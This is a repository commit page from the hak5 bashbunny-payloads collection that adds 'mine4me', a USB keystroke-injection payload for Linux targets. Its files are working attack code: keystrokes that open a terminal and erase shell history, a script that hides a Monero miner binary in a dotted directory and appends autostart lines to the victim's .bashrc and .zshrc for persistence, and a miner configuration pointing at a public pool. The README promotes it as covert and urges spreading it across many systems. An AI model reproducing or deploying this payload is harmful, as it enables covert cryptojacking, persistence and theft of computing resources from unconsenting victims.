hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Uploading mine4me (#533) 

* Uploaded BunnyLogger

* uploading payload intel

* Create README.md

* Update README.md

* uploaded LinuxPreter

* uploaded FileRipper

Faster executing version

* Update README.md

* fixing typo

* uploaded sudoSnatch

* Update README.md

* deleting sudoSnatch

* uploading payload

* Delete payload.sh

* Delete shell

* Delete systemBus

* Delete camPeek directory

* Update payload.sh

* Update payload.sh

* Delete payloads/library/execution/FileRipper directory

* Update payload.sh

* Update payload.sh

* Update payload.sh

* Update payload.sh

* uploading BLE_EXFIL extension

BLE_EXFIL extension, exfiltrates data via BLE

* BLE_EXFIL demo

* uploading mine4me

mine4me payload makes your target system mine Monero for you. Spread payload in multiple systems to acquire more Monero.

* category update
pull/536/head
drapl0n 2022-06-23 01:02:27 +05:30 committed by GitHub
parent 7d8994f7ac
commit c391cd7c76
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 292 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
payloads/library/execution/mine4me/README.md Normal file
View File

@ -0,0 +1,41 @@
## About:
* Title: mine4me
* Description: mine4me make your target's system mine Monero for you.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution
* Target: Unix-like operating systems.
* Attackmodes: HID, Storage
## mine4me: mine4me payload makes your target system mine Monero for you. Spread payload in multiple systems to acquire more Monero.
### Features:
* Autostart mining if Internet is connected.
* Fully covert.
* CPU/GPU mining.
* Persistent.
* Autostart payload on trigger.
* Intelligently manages processes.
### Changes to be made in mine4me/systemIn/config.json:
* MANDATORY: Enter your wallet address on line no `136`.
* Change mining pool(Default pool: `pool.hashvault.pro:443`) on line no `135`.
* Default configuration is for CPU mining for four threads, Can be configured in Block starting from line no `28` to `111`.
* Change number of threads assigned for mining at line no `105`.
* GPU mining can be enabled if you know hardware of target's system. OpenCL/CUDA required.
* For AMD GPU replace `"enabled": false,` with `"enabled": true,` at line no `113`.
* For NVIDIA GPU replace `"enabled": false,` with `"enabled": true,` at line no `122`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payloads/switch1/ |
| mine4me/ | /payloads/library/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n

10
payloads/library/execution/mine4me/mine4me/payload.sh Normal file
View File

@ -0,0 +1,10 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/payloads/library/mine4me/systemIn /var/tmp/.system/systemIO
chmod +x /var/tmp/.system/systemIO/systemIO
cp -r $mntt/payloads/library/mine4me/shell /tmp/
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell

10
payloads/library/execution/mine4me/mine4me/shell Normal file
View File

@ -0,0 +1,10 @@
#!/bin/bash
ls -a ~/ | grep 'zshrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO </dev/null &>/dev/null &\n\tdisown\n\tclear\nfi" >> ~/.zshrc
fi
ls -a ~/ | grep 'bashrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO </dev/null &>/dev/null &\n\tdisown\n\tclear\nfi" >> ~/.bashrc
fi

175
payloads/library/execution/mine4me/mine4me/systemIn/config.json Normal file
View File

@ -0,0 +1,175 @@
{
"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": false,
"host": "127.0.0.1",
"port": 0,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": false,
"colors": true,
"title": true,
"randomx": {
"init": -1,
"init-avx2": -1,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true,
"scratchpad_prefetch_mode": 1
},
"cpu": {
"enabled": true,
"huge-pages": true,
"huge-pages-jit": false,
"hw-aes": null,
"priority": null,
"memory-pool": false,
"yield": true,
"asm": true,
"argon2-impl": null,
"astrobwt-max-size": 550,
"astrobwt-avx2": false,
"argon2": [0, 2, 4, 6, 8, 10, 12, 14],
"astrobwt": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"astrobwt/v2": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"cn": [
[1, 0],
[1, 2],
[1, 8],
[1, 10]
],
"cn-heavy": [
[1, 0],
[1, 8]
],
"cn-lite": [
[1, 0],
[1, 2],
[1, 4],
[1, 6],
[1, 8],
[1, 10],
[1, 12],
[1, 14]
],
"cn-pico": [
[2, 0],
[2, 1],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[2, 8],
[2, 9],
[2, 10],
[2, 11],
[2, 12],
[2, 13],
[2, 14],
[2, 15]
],
"cn/upx2": [
[2, 0],
[2, 1],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[2, 8],
[2, 9],
[2, 10],
[2, 11],
[2, 12],
[2, 13],
[2, 14],
[2, 15]
],
"ghostrider": [
[8, 0],
[8, 2],
[8, 8],
[8, 10]
],
"rx": [0, 2, 8, 10],
"rx/arq": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"rx/wow": [0, 2, 4, 6, 8, 10, 12, 14],
"cn-lite/0": false,
"cn/0": false,
"rx/keva": "rx/wow"
},
"opencl": {
"enabled": false,
"cache": true,
"loader": null,
"platform": "AMD",
"adl": true,
"cn-lite/0": false,
"cn/0": false
},
"cuda": {
"enabled": false,
"loader": null,
"nvml": true,
"cn-lite/0": false,
"cn/0": false
},
"log-file": null,
"donate-level": 1,
"donate-over-proxy": 1,
"pools": [
{
"algo": null,
"coin": null,
"url": "pool.hashvault.pro:443",
"user": "YOUR_WALLET_ADDRESS",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"enabled": true,
"tls": false,
"wss": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null,
"submit-to-origin": false
}
],
"retries": 5,
"retry-pause": 5,
"print-time": 60,
"health-print-time": 60,
"dmi": true,
"syslog": false,
"tls": {
"enabled": false,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"dns": {
"ipv6": false,
"ttl": 30
},
"user-agent": null,
"verbose": 0,
"watch": true,
"pause-on-battery": false,
"pause-on-active": false
}

BIN
payloads/library/execution/mine4me/mine4me/systemIn/systemIO Normal file
View File

Binary file not shown.

56
payloads/library/execution/mine4me/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: mine4me
# Description: mine4me makes target's system mine crypto for you.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: Unix-like operating systems.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 1400
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 200
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/mine4me/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1500
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH